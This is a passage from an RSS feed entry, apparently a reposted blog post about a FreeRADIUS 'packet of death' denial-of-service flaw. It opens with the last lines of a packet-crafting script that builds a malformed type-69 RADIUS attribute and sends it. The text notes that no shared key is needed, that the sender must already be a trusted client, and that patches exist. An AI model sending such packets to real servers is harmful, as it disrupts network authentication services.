    RadiusAttr(type=69,value=”",len=2)<br />
    send(PoD)</code></p>
<p>Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.</p>
<p>I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.</p>
<p>source : <a href="http://www.braindeadprojects.com">www.braindeadprojects.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

